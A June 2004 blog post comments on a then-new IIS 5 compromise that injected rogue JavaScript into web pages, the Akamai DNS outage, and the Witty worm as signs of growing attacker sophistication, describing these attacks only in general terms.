i cant think: Widespread IIS Attack Surfaces - Attack Sophistication Increases

« It's Official: Women's Breasts are Evil | Main | Marlon Brando Dead at 80 »

June 24, 2004

Widespread IIS Attack Surfaces - Attack Sophistication Increases

Yet another in a steady stream of internet attacks employing unusual attack vectors surfaced today. The Computer Emergency Response Team (CERT) reported this afternoon that a widespread compromise involving Microsoft Internet Information Server 5 has been observed, and is at the present time still propagating throughout the 'net. Although very little information has been released as of yet, apparently the exploit causes IIS to append rogue javascipt to the bottom of web pages that are served. Once the web page is downloaded into the client browser, the rogue code executes and calls a file hosted on another server. This file may contain malicious code which then executes on the user's system.

This attack comes after last week's compromise of Akamai Networks in which service was interrupted to four of the world's largest websites, including Microsoft and Google. Akamai, an intensely secretive provider of domain name to IP address mapping services, at first blamed the outage on a widespread DDoS attack on their network. However, after being called on that story by Keynote Systems and Arbor Networks, officials at Akamai have since admitted that the attack specifically targeted DNS servers on their network.

Attacks such as these highlight a growing trend away from script-kiddie trojans and viruses toward a much more professional and well-informed scenario. These types of attacks require a thorough knowledge not only of code and operating systems, but also of the topology of the network and the way in which network services interact and build on one another. A thorough analysis of the target and the identification of the weakest link in the distributed system is the hallmark of this new breed of attacker.

On March 20 of this year, amidst headlines trumpeting Nimda, Slammer, and Blaster, W32.Witty.Worm was released into the wild. While not as media-friendly as it's bigger cousins, the ramifications of the construction and performance of this particular worm are much more threatening to the future of the internet, and much more telling of the sophistication of this new breed of attacker.

Several characteristics make this attack stand out as historical in precedent.

Firstly, Witty was speedily written. The details of the vulnerability that Witty exploited were first published on March 18. Two days later Witty was released into the wild. Even with this level of speed, Witty was very cleverly constructed. The core code consisted of only 637 bytes; however, Witty cleverly made use of a random number generator to vary the size of the file that was delivered to the target in order to evade IDS signatures and heuristic algorithms. This use of a random number generator also allowed Witty to target randomly-generated IP addresses on random ports. Further, once the code is in place it proceeds to wipe out random 128 sector blocks on the first eight hard drives that it finds attached to the infected system. And the code was bug free. That fact would suggest either that the author was an incredibly good programmer, or that some time was spent testing the worm before it was released.

Secondly, Witty targeted a vulnerability in security software, not simply an OS vulnerability. While it only managed to infect approximately 12,000 machines, this was the entire installed userbase. And by entering the 'net through a bot network of 100 or so rogue machines and also by clever use of it's random number generator it was able to do so in 45 minutes. Once again, we see that the attacker used a specific underlying root vulnerability to inflict maximum damage in the shortest time possible.

Clearly, the stakes of the security game are rising. And they are rising at an almost exponential pace. One shudders to think of the possibilities should these, for now, isolated techniques be brought together. Especially if the resources of a rogue nation-state were to be utilized in the process. To quote an oft overused Chinese insult, "May you live in interesting times."

Posted by bcoffee at June 24, 2004 10:02 PM